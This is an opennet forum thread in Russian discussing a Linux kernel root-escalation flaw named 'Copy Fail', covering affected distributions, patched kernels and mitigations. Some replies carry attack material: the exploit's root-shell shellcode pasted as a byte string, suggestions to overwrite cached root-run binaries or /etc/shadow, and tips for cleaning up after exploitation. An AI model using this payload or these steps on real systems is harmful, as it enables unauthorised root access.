Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов"	+/–
Сообщение от opennews (??), 30-Апр-26, 13:55
Исследователи из компании Xint выявили в ядре Linux уязвимость (CVE-2026-31431), позволяющую непривилегированному пользователю получить root-доступ к системе. Проблеме присвоено кодовое имя Copy Fail. Доступен прототип эксплоита. Возможность эксплуатации уязвимости продемонстрирована в Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1 и SUSE 16, но отмечается, что пакеты с ядром из других дистрибутивов, включая Debian, Arch, Fedora, Rocky и Alma, тоже подвержены проблеме, но их отдельно не тестировали... Подробнее: https://www.opennet.me/opennews/art.shtml?num=65325
Ответить | Правка | Cообщить модератору

Сообщения

[Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 30-Апр-26, 13:55	–14 +/–
SUID - зло. Который раз убеждаюсь.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #6, #8, #12, #108, #273

2. Сообщение от Аноним (2), 30-Апр-26, 13:58	+4 +/–
> но отмечается, что пакеты с ядром из других дистрибутивов, включая Debian, Arch, Fedora, Rocky и Alma, тоже подвержены проблеме, но их отдельно не тестировали > и устранена в ядрах 6.18.22, 6.19.12 и 7.0 Так в Федоре 42-44 актуальное ядро 6.19.14. Че они напраслину наводят...
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #24, #33, #95

4. Сообщение от Аноним (4), 30-Апр-26, 13:59	+5 +/–
В такие моменты окупается сборка ядра без всех не нужных тебе модулей. # CONFIG_CRYPTO is not set
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #18, #34, #109

5. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:02	+6 +/–
Охрененная д(ы|у)рень. И вот глядя на коммитик - а не сознательно ли она была запихана, слишком уж всё просто.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #49, #122, #305

6. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:03	+10 +/–
Ни отмена SUID, ничего не поможет в этом случае. Дыра позволяет переписать произвольно код любого прокешированного бинарника.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #64

7. Сообщение от Аноним (7), 30-Апр-26, 14:04	–1 +/–
Дыра очень опасная, в 2 клика пробивает практически любой актуальный дистр, на Гитхабе можно посмотреть отчеты от людей. ИИ стали как шахматные движки уже.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #10, #62

8. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:05	+2 +/–
(и не только бинарника, а вообще любого прокешированного файла в принципе)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

9. Сообщение от Аноним1234 (?), 30-Апр-26, 14:05	–1 +/–
На моём Ubuntu 24.04 LTS с последники апдейтами эксплоит работает
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #13, #53

10. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:06	+2 +/–
Она не то, что опасная, она 3.14ц. Это подмена кода любого прокешированного бинарника, замена данных в любом прокешированном файле, который доступен на чтение. Причём замена не на диске, а только в памяти.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #15, #26, #302

11. Сообщение от Соль земли2 (?), 30-Апр-26, 14:06	+2 +/–
При множестве глаз... А теперь представьте сколько уязвимостей сами знаете где.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #39, #70, #77, #121

12. Сообщение от Аноним (12), 30-Апр-26, 14:06	+14 +/–
При чем тут SUID? Тут страничный кеш правят, сделать могут что угодно и с кем угодно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

13. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:08	+1 +/–
Он будет работать везде, где ядро из тех, что были за последние 9 лет, и либо вкомпилен, либо модулем доступен algif_aead. Бань модуль / init.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9 Ответы: #30

14. Сообщение от Аноним (14), 30-Апр-26, 14:08	–5 +/–
Проверено мною на дистрибутивах RHEL9 и OEL9. Результат следующий: AttributeError: module 'os' has no attribute 'splice' Эксплойт не работает.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #16, #19, #25, #36, #54

15. Сообщение от мяв (?), 30-Апр-26, 14:09	–1 +/–
>3.14ц а Вы ведь правы, Ц(С) - он такой. зы. Ц был бы, если б, если б оно условно давало политики селинуксу менять. но оно не дает, вроде как на счет АА не уверена к слову
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #17

16. Сообщение от мяв (?), 30-Апр-26, 14:10	+3 +/–
пушто некропитон ? на лоре поищите ссылку на С-эксплоит
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #44

17. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:11	+/–
Не надо менять политики селинуксу. Надо найти какой-нибудь читабельный бинарник, запускаемый по таймеру или иным способом от рута, и поменять его. А дальше правь что хочешь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15 Ответы: #27, #60

18. Сообщение от runoverheads (ok), 30-Апр-26, 14:12	–2 +/–
не шифрования - нет защиты данных. к примеру DM_CRYPT - данных на диске.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #28

19. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:12	+1 +/–
Пыхтон староват, берите постарше. Работает прекрасно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

20. Сообщение от eugener (ok), 30-Апр-26, 14:13	+/–
На Ubuntu 26.04 эксплоит не работает. Вот польза от использования самого нового ядра.)
Ответить | Правка | Наверх | Cообщить модератору

21. Сообщение от Аноним (126), 30-Апр-26, 14:17	–1 +/–
Касперский уже ругается на скрипт эксплоида.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #29, #32, #41, #43

22. Сообщение от Аноним (-), 30-Апр-26, 14:18	+/–
AOSP (который является дистрибутивом Linux) этому не подвержен... Всё благодаря очень строгим и fine grained политикам SELinux. Стоит взять пример с AOSP и адаптировать его модель безопасности под настольные системы. Или использовать QubesOS.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #40, #42, #47, #48, #315

24. Сообщение от Аноним (24), 30-Апр-26, 14:25	+/–
кстате да, но тут скорее имеется ввиду что в федоре это в целом могло работать, например, в rhel часто выбрасывают подозрительные плагины и софт, из официальных реп оно не прилетит, а всякие дополнительные вы ставите на свой страх и риск.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

25. Сообщение от runoverheads (ok), 30-Апр-26, 14:25	+2 +/–
на сайте требование к PoC смотри, Python 3.10+ stdlib only (os, socket, zlib).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

26. Сообщение от Аноним (34), 30-Апр-26, 14:29	+/–
Ну тут залатали. Ты забыл уже CVE-2022-2590? У всех работала на обновлённых системах по тому же принципу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

27. Сообщение от Аноним (24), 30-Апр-26, 14:31	+2 +/–
ну, нет, буквально недавно поднимал туннель на ssh, он из пользователя норм работает, а если через systemd то в папке пользователя прочитать ключ уже не может, selinux запрещает, разрабы сказали что это фича, а не баг, пришлось поправить локальные правила selinux, ну в целом адекватно с учетом контекста
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

28. Сообщение от Аноним (4), 30-Апр-26, 14:32	+5 +/–
Суть сообщения отключать то чем не пользуешься. Если не шифруешь диски, то и модуль не нужен. Заодно будет меньше компилировать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18 Ответы: #35, #37

29. Сообщение от Аноним (24), 30-Апр-26, 14:34	+2 +/–
))) а спортлото?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

30. Сообщение от Аноним (34), 30-Апр-26, 14:34	+/–
Ну-ну. На 6.18.23 вон не работает. Вообще-то сейчас уже 6.18.25.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13

31. Сообщение от Аноним (126), 30-Апр-26, 14:34	–9 +/–
Rust говорит: У данных должен быть единственный владелец.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #76, #80, #213

32. Сообщение от runoverheads (ok), 30-Апр-26, 14:35	+/–
обфусцированный сделай. какой смысл от антивиров? их цель только сканировать. изменение страницы памяти не отловят
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

33. Сообщение от Другоанон (?), 30-Апр-26, 14:36	–1 +/–
Ну так естественно, что сперва предупредили разработчиков, подождали исправлений от них, а уж затем опубликовали данные об уязвимости публично. Было бы странно если бы сделали наоборот...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

34. Сообщение от Аноним (34), 30-Апр-26, 14:43	+/–
А зачем всё отключать? Этого не достаточно? CONFIG_CRYPTO_AEAD=y CONFIG_CRYPTO_AEAD2=y # CONFIG_CRYPTO_USER_API_AEAD is not set
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #90

35. Сообщение от Аноним (35), 30-Апр-26, 14:43	+1 +/–
>Суть сообщения отключать то чем не пользуешься. А как понять, чем не пользуешься? Не хочется в один прекрасный момент обнаружить отсутствие дров для условного wifi. >Заодно будет меньше компилировать. Если ставить готовый бинарник, то вообще компилировать не надо.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #87, #111

36. Сообщение от Аноним (126), 30-Апр-26, 14:44	+/–
Его еще не оптимизировал, горе-оптимизатор. К счастью.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

37. Сообщение от runoverheads (ok), 30-Апр-26, 14:44	–2 +/–
наивно както
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28

38. Сообщение от хрю (?), 30-Апр-26, 14:44	+/–
>В предложенном эксплоите А кто-от рассказывал, что перл не понятный и то ли дело пистон. Тут прям постарались сделать максимально не понятно.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #59, #79

39. Сообщение от Другоанон (?), 30-Апр-26, 14:45	+2 +/–
При этом "множестве глаз" большое кол-во драйверов/подсистем ядра, на сегодняшний день, никем не сопровождаются. А касаются их, только когда они ломаются из-за изменений в api ядра, и то не вникая в них, чисто устранить ошибку сборки.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #177, #199

40. Сообщение от aname (ok), 30-Апр-26, 14:46	–1 +/–
SELinux вообще хорош. И его в принципе надо бы побольше юзать
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22 Ответы: #68

41. Сообщение от Другоанон (?), 30-Апр-26, 14:50	+/–
KVRT-шкой что ли проверял? Или касперский полноценную linux версию выпустил?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21 Ответы: #46, #114

42. Сообщение от Tron is Whistling (?), 30-Апр-26, 14:51	+/–
Не поможет тебе selinux. Если у тебя что-то запускается в кроне том же от рута, что может юзер прочитать - да хоть cat - всё.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22 Ответы: #55, #240

43. Сообщение от Аноним (43), 30-Апр-26, 14:53	+/–
"Антивирус в линуксе ненужон!" (с)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21 Ответы: #50, #51

44. Сообщение от Аноним (14), 30-Апр-26, 14:53	–4 +/–
Спасибо. Эксплойт на C сработал. Только одно "но". Для сборки на узле требуется glibc-static, которого исходно нет. А для установки пакета требуются root-права.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #63, #212, #290

46. Сообщение от Аноним (126), 30-Апр-26, 14:57	+1 +/–
В данный момент работаю под виндой. Каспер чуткий - кричит на эксплоид для linux. )
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #113

47. Сообщение от runoverheads (ok), 30-Апр-26, 14:58	+/–
SELinux не поможет когда можно любой файл переписать. или там AF_ALG интерфейс запретили в ущерб производительности ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22 Ответы: #310

48. Сообщение от Аноним (60), 30-Апр-26, 14:58	+/–
Да и Qubes не поможет, ты же не будешь по отдельной ОС на процесс выделять, иначе охренешь от системных требований по оперативе, да и без SSD не обойдёшься. Нужно другое API, где вообще на каждый кусочек API - разрешения, вообще на каждый кусочек, с максимальной гранулярностью, и в приложении и либе - манифест, и дальше кусочка попробует пойти - процесс будет уничтожен.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22 Ответы: #61, #66

49. Сообщение от PnD (??), 30-Апр-26, 14:59	+3 +/–
По первой ссылке расписана классическая трёхходовка. - Заносим сложную систему. (Здесь пока всё выверено, хотя простые баги могут проскакивать.) - Рефакторим, типа для универсальности. В процессе интегрируемся с целевыми узлами, тоже объясняем что так удобнее. - Добавляем оптимизацию. Какую надо. "Вот только торопиться не надо, да?"©
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

50. Сообщение от Аноним (126), 30-Апр-26, 14:59	+1 +/–
Linux в виртуалка, не крякнув, проглотил эскплоид с гитхаба.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #91

51. Сообщение от Аноним (60), 30-Апр-26, 14:59	+/–
Как антивирус тебя защитит от зиродея? Никак.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #72, #74

52. Сообщение от Аноним (52), 30-Апр-26, 15:03	–2 +/–
Всё ещё верите в "безопасность" контейнеров? )
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #92, #211, #215

53. Сообщение от Аноним (153), 30-Апр-26, 15:03	+/–
Пора: https://opennet.ru/65274-ubuntu
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

54. Сообщение от Аноним (153), 30-Апр-26, 15:06	+/–
Обновляйтесь на 10.1 https://opennet.ru/64385-oracle
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

55. Сообщение от Аноним (-), 30-Апр-26, 15:11	–1 +/–
Это вопрос архитектуры в целом. SELinux — это один из инструментов для реализации этой самой архитектуры. Нужно просто не запускать все процессы с полными правами, а явно давать им только те права, которые им нужны для выполнения их задачи. В AOSP с полными привелегиями работает только очень небольшое количество программ (init, например). Есть сервисы, которые работают от имени root, но всё ещё ограничены SELinux. >[оверквотинг удален] > > Android has a versioned app sandbox which gets stricter for new API levels. The versioned domains inherit from that untrusted_app_all domain. > > Android's usage of SELinux is drastically different from mainstream desktop and server Linux distributions where it's only lightly used in a very targeted way. This is a nice example showing how it massively reduces Linux kernel attack surface on AOSP-based operating systems including GrapheneOS. > > Android splits SELinux into system and vendor policies. Both of these must conform to the extensive neverallow rules. The vendor policies are defined as part of implementing hardware support for a device and permit what's required by the drivers. Most of the driver code is sandboxed userspace code. > > Android extended SELinux with support for ioctl command allowlists to reduce kernel attack surface. These ioctl command allowlists are used for sockets and many other core kernel devices to limit attack surface. It's also used with drivers in the vendor policies such as GPU ioctl command allowlists > > AOSP also doesn't permit setuid or setgid binaries which was the chosen attack vector for exploiting it in the proof of concept exploit. It similarly doesn't permit io_uring, user namespaces and a lot of other functionality outside of a few core processes for security reasons. Как-то так.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #57, #207

56. Сообщение от sig11 (ok), 30-Апр-26, 15:12	–4 +/–
>Уязвимость выявлена при помощи AI Да что этот ИИ умеет? Человек с мозгами наше все! (сарказм)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #73, #83

57. Сообщение от Аноним (-), 30-Апр-26, 15:13	+/–
>  AOSP only permits using specific types of sockets throughout the OS. It only permits the dumpstate process used to create bug report zips to access AF_ALG sockets. > > SELinux is based on explicitly listing out everything that's permitted and anything not listed isn't allowed. AOSP uses strict, fine-grained SELinux policies for the whole OS. Instead of simply permitting everything that's used in a fine-grained way, the rest of the OS is developed with it in mind. > > Android makes extensive use of neverallow rules to define and enforce the security goals for the SELinux. Since SELinux uses an allowlist approach, neverallow rules don't directly disallow anything at runtime but rather prevent creating rules violating the constraints. It does this for socket types. > > Here's where Android defines a neverallow for many types of sockets including AF_ALG for regular sandboxed apps: > https://android.googlesource.com/platform/system/sepolicy/+/... Эх, обрезало. Вот начало.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55

58. Сообщение от PnD (??), 30-Апр-26, 15:13	+/–
Нюанс: в связи с сутью эксплоита "доработанный" файл xxx становится "публичным достоянием" до чистки буферов. И своих прямых обязанностей в связи с этим выполнять не может. Нужно что-то типа # echo 3 > /proc/sys/vm/drop_caches Но из-под исправленного xxx чистка не сработает (понятно почему). Нужно положить задачу условному cron/systemd и не забыть прибрать за собой. (Не надо пожалуйста меня поправлять. Путь киддиса — страдание. Хватит того что уроды выложили не заглушенный PoC.)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #82, #191

59. Сообщение от Аноним (60), 30-Апр-26, 15:14	+/–
Да, я прифигел от такого отношения, что вместо чистого кода прототип обфусцирован, да ещё какой-то блоб через zlib распаковывает, я бы поостерёггся этот блоб zlibом распаковывать ванильным, а только оным на Rustе.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #67

60. Сообщение от Аноним (60), 30-Апр-26, 15:17	+/–
Зачем менять бинарник, если можно /etc/shadow?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #139, #140, #141

61. Сообщение от Аноним (-), 30-Апр-26, 15:18	+/–
И не нужно под каждый процесс. Достаточно выделять отдельные qubes под отдельные домены, качественно компартментализировать. QubesOS спроектирована в расчёте на то, что компрометация root внутри отдельного qube — не катастрофа, а допустимый сценарий: всё ценное и так доступно под обычным пользователем.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #97

62. Сообщение от Аноним (62), 30-Апр-26, 15:20	+/–
в Red OS 8 ядро 6.12
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #142, #153

63. Сообщение от Аноним (35), 30-Апр-26, 15:20	+3 +/–
>Для сборки на узле требуется glibc-static, которого исходно нет. А для установки пакета требуются root-права. Линкуете статически с musl, и вам достаточно будет скопировать один единственный файл.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

64. Сообщение от Аноним (64), 30-Апр-26, 15:23	+1 +/–
банальное отравление кеша :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #118

66. Сообщение от Аноним (-), 30-Апр-26, 15:26	+/–
> Да и Qubes не поможет, ты же не будешь по отдельной ОС на процесс выделять, иначе охренешь от системных требований по оперативе, да и без SSD не обойдёшься. Не вижу проблем в том, чтобы достать SSD чисто под систему и образы VM. В QubesOS есть динамическое управление памятью.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48

67. Сообщение от Аноним (34), 30-Апр-26, 15:26	+/–
Там просто b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #59

68. Сообщение от Аноним (62), 30-Апр-26, 15:26	+/–
>его ... надо бы побольше юзать А, кстати, кто разработал SELinux?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #78, #128

70. Сообщение от Аноним (70), 30-Апр-26, 15:26	–5 +/–
>теперь представьте сколько уязвимостей сами знаете где. На Windows? Там намного меньше уязвимостей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #146, #222

72. Сообщение от Аноним (43), 30-Апр-26, 15:31	+/–
Вступайте и кампелируйте!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

73. Сообщение от Аноним (76), 30-Апр-26, 15:32	+2 +/–
ИИ всё умеет! Найти дыру, внедрить дыру, которую другой ИИ не найдёт, всё умеет. Сам ИИ уже спецы как "живую интеллектуальную дыру" рассматривают.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #56

74. Сообщение от Аноним (77), 30-Апр-26, 15:33	+1 +/–
Так вот же, базы уже обновились, а когда система обновится? (не говоря уже о том, что каждый ССЗБ очень любит "контролировать" процесс обновлений).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51 Ответы: #105

76. Сообщение от Аноним (76), 30-Апр-26, 15:34	+/–
Кто владеет ИИ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31

77. Сообщение от Аноним (77), 30-Апр-26, 15:35	+1 +/–
"Представляю, что в Ереване творится"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

78. Сообщение от Аноним (-), 30-Апр-26, 15:38	+2 +/–
АНБ. Если вас это напрягает — не пользуйтесь. У SELinux нет альтернатив с таким же уровнем покрытия.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68

79. Сообщение от Аноним (79), 30-Апр-26, 15:39	+/–
да нет, стандартная техника минимизации размера раскрутить обратно в нормальный скрипт задача на пять минут
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38 Ответы: #85, #93

80. Сообщение от Аноним (62), 30-Апр-26, 15:39	+2 +/–
Тут ошибка в логике работы, Rust бы не защитил. И в Rust'е может быть несколько владельцев с возможностью модификации данных (через RefCell).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31 Ответы: #96

82. Сообщение от Аноним (79), 30-Апр-26, 15:40	+/–
ну сейчас скрипткидди еще проще - даже слегка поломаный PoC скармливается нейронке с просьбой поправить
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58

83. Сообщение от Аноним (62), 30-Апр-26, 15:41	+/–
Ломать - не строить
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #56 Ответы: #161

85. Сообщение от Аноним (34), 30-Апр-26, 15:43	–1 +/–
Чатгпт справился за 1 секунду. Ну, по мнению чатбота, не проверял. Даже разжевал и прокомментировал каждый шаг.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79

87. Сообщение от Аноним (4), 30-Апр-26, 15:43	+2 +/–
Тут придется головой думать конечно, настройка и сборка собственного ядра задача не для рядового пользователя. Нужно знать какое у тебя железо и какие драйверы оно использует. Утилиты типа modprobed-db в помощь. Если даже что-то забыл, с учетом его минимальности пойти пересобрать несложно. У моего полный clean build занимает всего 2 минуты.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #119

88. Сообщение от mikhailnov (ok), 30-Апр-26, 15:45	+1 +/–
> уязвимость можно использовать для получения доступа к хост-окружению из контейнера Запустил контейнер через systemd-nspawn -U (pivate users), получил root, запустил sleep inifinity, посмотрел на хосте ps aux | grep sleep - с точки зрения хоста запущен не от root.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #106, #298

90. Сообщение от Аноним (4), 30-Апр-26, 15:46	+/–
Для митигации этой конкретной уязвимости достаточно. Но сообщение было не об этом, а о максимальном уменьшении поверхности атаки в принципе.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34 Ответы: #103

91. Сообщение от Аноним (43), 30-Апр-26, 15:46	+/–
Ниможет быть! В Линкус пакетный менеджер, и ПО может быть установлено только из проверенных репозиториев!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #50 Ответы: #187

92. Сообщение от Аноним (-), 30-Апр-26, 15:50	+/–
gVisor защитил бы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #267

93. Сообщение от Аноним (102), 30-Апр-26, 15:51	+2 +/–
Кому нужна в PoC минимизация размера? В PoC наоборот должны быть подробнейшие развёрнутые комментарии.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79 Ответы: #256

95. Сообщение от Аноним (95), 30-Апр-26, 15:54	+1 +/–
> Так в Федоре 42-44 актуальное ядро 6.19.14. Че они напраслину наводят... [2026-03-23] Vulnerability reported to Linux kernel security team [2026-03-24] Initial acknowledgment received https://lwn.net/Articles/1068982/ > Subject:          Linux 6.19.14 > Date:          Wed, 22 Apr 2026 13:59:14 +0200 > Herbert Xu (2): >      crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl >      crypto: algif_aead - Fix minimum RX size check for decryption
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #102

96. Сообщение от Аноним (126), 30-Апр-26, 15:54	+/–
"а смещение для операции записи в тег аутентификации рассчитывалось относительно скопированных данных без должных проверок, что позволяло перезаписать произвольные области в страничном кэше." Вряд ли кто дал возможность двух владельцев для столь чувствительных данных. Суть всё же, что вместо копии давалась прямая ссылка на данные, структура которых известна, и доступа по прямому смещению.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80 Ответы: #138

97. Сообщение от Аноним (102), 30-Апр-26, 15:55	+1 +/–
Кстати да, совершенно необязательно даже рут получать, всё самое ценное во всех системах и так доступно самой непривелигированной программе.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61 Ответы: #208

102. Сообщение от Аноним (102), 30-Апр-26, 16:01	–2 +/–
>Please move to the 7.0.y kernel branch at this point in time. Обновляться не будем - оборудование-то дропнули.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #95

103. Сообщение от Аноним (34), 30-Апр-26, 16:01	+/–
Уязвимости всё больше в этих местах. В точке, где у пользователя есть доступ к этим апи. То же самое с bpf, к примеру.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #90

105. Сообщение от Аноним (102), 30-Апр-26, 16:02	+/–
У меня система ещё вчера обновилась.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74 Ответы: #160

106. Сообщение от Аноним (126), 30-Апр-26, 16:03	+/–
для systemd ничто не рут кроме него. nspawn это другое пространство и рут там другой.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

108. Сообщение от Аноним83 (?), 30-Апр-26, 16:10	+/–
Ну да, какой в нём смысл, надо сразу под рутом заходить, когда поработать с системой требуется.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

109. Сообщение от Аноним83 (?), 30-Апр-26, 16:11	+/–
Она окупается ещё во время самой сборки - собирается быстрее :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #304

111. Сообщение от april (?), 30-Апр-26, 16:14	+/–
под большим (и желательно максимально модульным) ядром подключаешь и настраиваешь всё чем планируешь пользоваться (чтобы все используемые модули подгрузились) и делаешь "make localmodconfig", оно всё ненужное выпилит
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #152, #170

113. Сообщение от Аноним (126), 30-Апр-26, 16:19	+/–
а вот си версию пропустил.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46 Ответы: #127

114. Сообщение от Имя (?), 30-Апр-26, 16:20	+/–
Давно уже выпустил
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #132

116. Сообщение от Аноним (116), 30-Апр-26, 16:28	+/–
получается что можно рутовать любой телефон?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #120

118. Сообщение от Аноним (118), 30-Апр-26, 16:33	+9 +/–
> Уязвимость вызвана логической ошибкой Эх, и даже безопасным языком в ядре ничего не исправить.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #124, #126, #163

119. Сообщение от Аноним (35), 30-Апр-26, 16:33	–1 +/–
Вопрос не в железе. Я некоторое время назад запускал docker внутри systemd-nspawm и systemd отключил какие-то системные вызова, а docker, вместо того, чтобы написать про невозможность выполнить этот вызов, писал про какую-то произвольную ошибку. И тут два варианта - либо найти того, кто запускал в этой же конфигурации ранее, и записал как исправить, либо самому потратить несколько часов на отладку. И предсказать, где и кто упадёт следующим - тяжело.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #149

120. Сообщение от Аноним (120), 30-Апр-26, 16:40	+/–
Ах, если бы zcat /proc/config.gz | grep AEAD                                                                                                                                                 CONFIG_CRYPTO_AEAD=y CONFIG_CRYPTO_AEAD2=y # CONFIG_CRYPTO_USER_API_AEAD is not set
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #116

121. Сообщение от Аноним (118), 30-Апр-26, 16:40	+/–
> представьте сколько уязвимостей сами знаете где А там нету такой интенсивной разработки, как в линуксе. Там не выпускают ДиректХ каждые 3 недели новый.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

122. Сообщение от Аноним (126), 30-Апр-26, 16:57	+/–
За прямую ссылку в ссылку. )
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

124. Сообщение от aname (ok), 30-Апр-26, 17:08	+7 +/–
ЭТА ДРУГОЕ11111
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118

125. Сообщение от Аноним (125), 30-Апр-26, 17:08	+/–
author    Stephan Mueller <smueller@chronox.de>    2017-07-30 committer Herbert Xu <herbert@gondor.apana.org.au> было бы неплохо проверить как изменилось благосостояние эти граждан А еще лучше - перестать доверять критические фугкции каким-то анонимным васянам.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #135, #150

126. Сообщение от Аноним (126), 30-Апр-26, 17:10	–4 +/–
Вряд ли от процесса к процессу rust допустил бы прямую ссылку. Клонировал бы точно. Это если речь идет не о unsafe.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118 Ответы: #194

127. Сообщение от aname (ok), 30-Апр-26, 17:12	+/–
Так это ж Си
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #113

128. Сообщение от aname (ok), 30-Апр-26, 17:13	+4 +/–
